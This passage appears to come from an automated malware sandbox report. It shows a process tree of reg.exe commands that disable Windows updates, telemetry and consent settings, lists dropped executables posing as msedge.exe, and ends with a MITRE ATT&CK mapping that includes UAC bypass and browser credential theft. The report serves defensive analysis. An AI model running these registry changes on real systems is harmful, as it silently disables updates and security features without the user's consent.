  PID:3164
- C:\Windows\system32\reg.exe
  Reg.exe add "HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Settings" /v "DownloadMode" /t REG_DWORD /d "0" /f
  2⤵
  - Modifies data under HKEY_USERS
  PID:4720
- C:\Windows\system32\reg.exe
  Reg.exe add "HKCU\Control Panel\International\User Profile" /v "HttpAcceptLanguageOptOut" /t REG_DWORD /d "1" /f
  2⤵
  PID:1156
- C:\Windows\system32\reg.exe
  Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\DriverSearching" /v "SearchOrderConfig" /t REG_DWORD /d "0" /f
  2⤵
  PID:3496
- C:\Windows\system32\reg.exe
  Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Device Metadata" /v "PreventDeviceMetadataFromNetwork" /t REG_DWORD /d "1" /f
  2⤵
  PID:2936
- C:\Windows\system32\reg.exe
  Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "NoAutoUpdate" /t REG_DWORD /d "1" /f
  2⤵
  PID:3588
- C:\Windows\system32\reg.exe
  Reg.exe add "HKCU\Software\Microsoft\Windows\DWM" /v "EnableAeroPeek" /t REG_DWORD /d "0" /f
  2⤵
  PID:4424
- C:\Windows\system32\reg.exe
  Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\location" /v "Value" /t REG_SZ /d "Deny" /f
  2⤵
  PID:4432
- C:\Windows\system32\reg.exe
  Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\appDiagnostics" /v "Value" /t REG_SZ /d "Deny" /f
  2⤵
  PID:3636
- C:\Windows\system32\reg.exe
  Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\userAccountInformation" /v "Value" /t REG_SZ /d "Deny" /f
  2⤵
  PID:1648
- C:\Windows\system32\reg.exe
  Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" /v "SilentInstalledAppsEnabled" /t REG_DWORD /d "0" /f
  2⤵
  PID:2480
- C:\Windows\system32\reg.exe
  Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" /v "SystemPaneSuggestionsEnabled" /t REG_DWORD /d "0" /f
  2⤵
  PID:4920
- C:\Windows\system32\reg.exe
  Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" /v "SoftLandingEnabled" /t REG_DWORD /d "0" /f
  2⤵
  PID:3668
- C:\Windows\system32\reg.exe
  Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" /v "RotatingLockScreenEnabled" /t REG_DWORD /d "0" /f
  2⤵
  PID:708
- C:\Windows\system32\reg.exe
  Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "PublishUserActivities" /t REG_DWORD /d "0" /f
  2⤵
  PID:1892
- C:\Windows\system32\reg.exe
  Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "UploadUserActivities" /t REG_DWORD /d "0" /f
  2⤵
  PID:4444
- C:\Windows\system32\reg.exe
  Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\BackgroundAccessApplications" /v "GlobalUserDisabled" /t REG_DWORD /d "1" /f
  2⤵
  PID:388
- C:\Windows\system32\reg.exe
  Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Search" /v "BackgroundAppGlobalToggle" /t REG_DWORD /d "0" /f
  2⤵
  PID:2004
- C:\Windows\system32\reg.exe
  Reg.exe add "HKLM\Software\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config" /v "DownloadMode" /t REG_DWORD /d "0" /f
  2⤵
  PID:4664
- C:\Windows\system32\reg.exe
  Reg.exe add "HKLM\Software\Policies\Microsoft\Windows\DataCollection" /v "DoNotShowFeedbackNotifications" /t REG_DWORD /d "1" /f
  2⤵
  PID:2196
- C:\Windows\system32\reg.exe
  Reg.exe add "HKCU\SOFTWARE\Microsoft\Siuf\Rules" /v "NumberOfSIUFInPeriod" /t REG_DWORD /d "0" /f
  2⤵
  PID:4376
- C:\Windows\system32\reg.exe
  Reg.exe add "HKCU\SOFTWARE\Microsoft\Siuf\Rules" /v "PeriodInNanoSeconds" /t REG_DWORD /d "0" /f
  2⤵
  PID:4568
- C:\Windows\system32\reg.exe
  Reg.exe add "HKCU\Software\Policies\Microsoft\Assistance\Client\1.0" /v "NoExplicitFeedback" /t REG_DWORD /d "1" /f
  2⤵
  PID:5028
- C:\Windows\system32\reg.exe
  Reg.exe add "HKCU\SOFTWARE\Microsoft\Assistance\Client\1.0\Settings" /v "ImplicitFeedback" /t REG_DWORD /d "0" /f
  2⤵
  PID:2980

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:3584

C:\Windows\system32\srtasks.exe
C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1040

C:\Users\Admin\AppData\Local\msedge.exe
C:\Users\Admin\AppData\Local\msedge.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2196

C:\Users\Admin\AppData\Local\msedge.exe
C:\Users\Admin\AppData\Local\msedge.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2164

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery